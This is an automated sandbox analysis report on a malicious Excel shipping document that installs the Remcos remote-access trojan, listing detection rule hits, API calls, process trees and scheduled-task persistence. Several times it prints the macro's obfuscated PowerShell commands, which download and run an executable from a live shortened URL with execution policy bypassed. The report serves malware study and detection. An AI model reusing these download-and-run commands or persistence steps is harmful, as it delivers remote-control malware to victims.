                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 29_2_04395959
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040D2A6
                Source: Shipping Document PLBL003534.xlsOLE indicator, VBA macros: true
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: String function: 00413E72 appears 98 times
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: String function: 0041203B appears 62 times
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: String function: 00414176 appears 50 times
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: String function: 00413E72 appears 49 times
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: String function: 0041203B appears 31 times
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: remcos.exeBinary or memory string: oj; *.csproj; *.user; *.xbap
                Source: remcos.exe, 00000021.00000000.2256915301.00000000001B2000.00000020.00020000.sdmpBinary or memory string: ?*.xml; *.xaml; *.xsl; *.rss; *.cfg; *.config; *.manifest; *.snippet; *.htm; *.html; *.asp; *.aspx; *.asmx; *.ascx; *.master; *.vbproj; *.csproj; *.user; *.xbap
                Source: remcos.exeBinary or memory string: *.xml; *.xaml; *.xsl; *.rss; *.cfg; *.config; *.manifest; *.snippet; *.htm; *.html; *.asp; *.aspx; *.asmx; *.ascx; *.master; *.vbp
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@47/20@27/3
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\0DFE0000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-AQK4L7
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\vdewBXiaBrkzxslmwGlfvaQxP
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF630.tmpJump to behavior
                Source: Shipping Document PLBL003534.xlsOLE indicator, Workbook stream: true
                Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............T.......X.......I.................................................................'.....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................".........E.R.R.O.R.:. ...p.......l...............A.......................................(.........................".....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................".........E.R.R.O.(.P.....p.......l...............G...............................................j.................".....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................,.........E.R.R.O.R.:. ...........`.......P.......Y.........................................'.......................,.....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................,.........E.R.R.O.(.P.............`.......P......._...............................................j.................,.....
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Users\user\AppData\Local\Temp\sm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: sm.exeString found in binary or memory: /add[@key="
                Source: sm.exeString found in binary or memory: /add[@key="
                Source: remcos.exeString found in binary or memory: /add[@key="
                Source: remcos.exeString found in binary or memory: /add[@key="
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2120752500.0000000002AB0000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2157363185.0000000002890000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2183380304.000000001B880000.00000002.00000001.sdmp

                Data Obfuscation:

                barindex
                .NET source code contains potential unpackerShow sources
                Source: kXLgfvFKbJs.exe.12.dr, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 16.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 16.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 17.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 17.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: remcos.exe.18.dr, IllogicalCallContext/IWinRTClassActivator.cs.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Obfuscated command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
